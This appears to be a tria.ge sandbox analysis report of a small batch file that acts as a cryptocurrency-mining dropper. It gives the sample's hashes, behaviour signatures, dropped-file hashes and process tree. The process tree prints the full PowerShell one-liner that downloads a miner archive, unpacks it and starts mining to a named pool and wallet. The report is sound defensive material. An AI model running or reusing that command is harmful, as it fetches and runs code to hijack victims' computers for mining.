Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1807s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
03/02/2024, 10:59
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-ja
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 204 powershell.exe 4 204 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1432 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1432 cpuminer-sse2.exe 1432 cpuminer-sse2.exe 1432 cpuminer-sse2.exe 1432 cpuminer-sse2.exe 1432 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 204 powershell.exe 204 powershell.exe 204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 204 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4296 wrote to memory of 204 4296 cmd.exe 75 PID 4296 wrote to memory of 204 4296 cmd.exe 75 PID 204 wrote to memory of 2256 204 powershell.exe 76 PID 204 wrote to memory of 2256 204 powershell.exe 76 PID 2256 wrote to memory of 1432 2256 cmd.exe 78 PID 2256 wrote to memory of 1432 2256 cmd.exe 78
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1432
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
637KB
MD5784f70a59ad38f3107fec67d684a6122
SHA19d579085b4e696c93af960681ab4e3710d3f6207
SHA2569ba4273c809d92d4233b7fcc6f4d9c1bf89e5163eeb551fd0dc7c5d62b475616
SHA51293ab2c8c55497bcc389840c438da33891ffd86a6755672806f54f1b0c1318eca41641e4a582116a07f2525c91d3f39bd3e6c7a4cebf45bf2fee9ce10251541bb
-
Filesize
593KB
MD54d7aec6b22d1db8f3594531f4a237845
SHA171695a2f55361d5a6e626528573c3ecb552a352c
SHA256243536710d81959c33e04ddff13b21149b8db2f3ddd875f49742df93b0e4a98e
SHA5120a8d399914efbcb89c0e72c43b964b8a0086b92c5fe5b4b5a56c7c6e01cd2e5c6bae8092b78b41eb87af2184127869bc90ebfa4fe940aa1e46983179f1261927
-
Filesize
300KB
MD504ea23ea29f6d2cba72004c7dd4ab470
SHA1bb1d7e7a036ed10c5f1de5c7213df0fc1d17bee0
SHA25609ae248b88ef27a05d59991cfc273ed5e41c87b39ce91e0b51c47130f0a67b3d
SHA51286f6cf9a4315d774ae205f77cc4dfaf3f27e6dde2a224c6a0f55888a49bdf325d27eea8d241d21240379fae1201d625e310edd383dc26534ce4003ecfe4458db
-
Filesize
589KB
MD56fc8e4914458ef6ac594a04e01005f8c
SHA1656e2c0d29eb0d6bed0e97d3ac70381b6a0c1b25
SHA2567a3cf68463451d20364b4b4b47a57bfb630396e0eaed63bc6cd9a7f2121f1611
SHA5120a6353fed3afcf67e96cc8aa86eab857fa58dba0d8eb2a47da5404131c8a1b54ae0cc0682cf635ad776803cb6efd9452950b9c0d623eeec78164de02fdc53711
-
Filesize
660KB
MD5041647cf492808f16ab0e1f1644f0bf7
SHA1a3744c2a5cbe198da69de758ca0843a4aa802d87
SHA256bc55e0e70dd4861a8b52c2038e0c44fb3e9334e9079d79a401b31e2c319c181f
SHA512e3b900e876e770129bf438a768c9d12f403bcafa2bcca58816cd84fcb703a5d8b06b05e2ddbd4231d8fb9efa120f15d16d42846136bf8faff7165966177d3f61
-
Filesize
259KB
MD5aadb714d75b37753857ca43d0f4b82cc
SHA14c9223e0821ceaea058c769a7cef06a6a5a5b40c
SHA256fde72a8e7e0e6331e082faaab40cbaa648fb38ce0d607a95103549f7d69bae8f
SHA5124bec45781904bfd9e069d53ff30c1df3578878e855fbecad9c9f4dd3cb9ee3ea621f38643d5b9963de814d9e8fb3cb7abe8d601621ea366606fdd134c9905433
-
Filesize
309KB
MD5a934921c0388cf46096a803afebf1e8e
SHA13e1b96c27e20ca71010c983af981d3debf444f37
SHA25655c5b676d2df786ebe0cf6b4c769dfa1522ea25d4156954bd3934f84e11f93f2
SHA512baf45515fc1136bf2b86b690cb8e5f31c3418c06bad79ef9e05ab44be7e3720b6fcabfaad42b289ec04acc6e583fb00e324c3385acd4eae8cdb58b7892219903
-
Filesize
373KB
MD5c3d46df45f185f8a58cf26449e70e559
SHA1f9dc100abcf36e0d9351dcf5c3334caee1bfe6fa
SHA256d237158d4a02871d0e605f2bc5f43ca9a8b0d8a70ccdd3ceae2ff2dcf895bef2
SHA512901492daacab138433d6391859ec0bb7162535290e234463610e34b634d3b0112e88d056ea21a161bcf3fa54f2583a7df4b9911649b21620cb5259a212d66eff
-
Filesize
376KB
MD5b1c0d06f72fc09422bb4ad337372e7e6
SHA1dda928bdda3961415f09b99e0ada7227eef28a56
SHA256355f1cc0b133887904ed732d946513321963f5c5a0d208329e95ed8195834259
SHA512a07f69c16e44d67341b9a657d2a2c725c70198d37154f18fb96df3563b8b18377994c7468a292ff263840b93dda4776ce40214aa199dd6c7685898b089f84c74
-
Filesize
211KB
MD573e7b436354612890085cf0f348a6d0f
SHA117c721cdf992d463b65b4c020cd562713983dfd4
SHA256edcf004e3917ee6538d4f64a88ebf8be0ad2c12ea0fb28c7965f1dad288bac2e
SHA512cece0d88191c35a20d6442533d0c796968a817afc49e3431c5942fab6f4ee8f6bea897778bf7b44d0bd26c7245934586f7787d0853ff1c645e10c31388d7ab3a
-
Filesize
270KB
MD5dbe752d654104a7f61bf6547a11d0860
SHA18751ff8bd4a48b948bdd5332fc0c777caef74088
SHA256df6cee4ee91a210618f1fef0b0c667931fc736bc6ecc0f4719913a5a16a6d06e
SHA512878dda84fbada6bc2c2c7a9a3853e85011d9f663cd2ebcf9b4a7694fcda013ba15bf025727d028c24b3f768b0a18df0e7100761782800631a6edd8bfc77a814f